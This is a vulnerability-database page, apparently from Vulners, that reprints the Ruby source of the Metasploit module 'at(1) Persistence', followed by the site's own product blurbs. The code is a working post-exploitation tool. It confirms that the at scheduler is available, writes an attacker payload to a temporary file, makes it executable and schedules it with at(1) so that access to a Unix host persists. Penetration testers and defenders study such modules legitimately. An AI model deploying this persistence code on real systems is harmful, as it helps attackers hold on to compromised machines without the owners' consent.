Lucene search
K

at(1) Persistence

🗓️ 22 Dec 2016 09:33:08Reported by Jon Hart <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 30 Views

Persistence achieved by executing payloads via at(1

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'at(1) Persistence',
        'Description' => %q{
          This module achieves persistence by executing payloads via at(1).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jon Hart <[email protected]>'
        ],
        'Targets' => [['Automatic', {} ]],
        'DefaultTarget' => 0,
        'Platform' => %w[unix],
        'Arch' => ARCH_CMD,
        'DisclosureDate' => '1997-01-01', # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
        }
      )
    )

    register_options([
      OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted.', 'now'])
    ])

    register_advanced_options([
      OptString.new('PATH', [false, 'Path to store payload to be executed by at(1).  Leave unset to use mktemp.'])
    ])
  end

  def check
    token = Rex::Text.rand_text_alphanumeric(8)
    if cmd_exec("atq && echo #{token}").include?(token)
      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  def exploit
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NoAccess, 'User denied cron via at.deny')
    end

    unless (payload_file = (datastore['PATH'] || cmd_exec('mktemp')))
      fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
    end

    write_file(payload_file, payload.encoded)
    register_files_for_cleanup(payload_file)

    cmd_exec("chmod 700 #{payload_file}")
    cmd_exec("at -f #{payload_file} #{datastore['TIME']}")

    print_status("Waiting up to #{datastore['WfsDelay']}sec for execution")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2023 04:45Current
0.9Low risk
Vulners AI Score0.9
30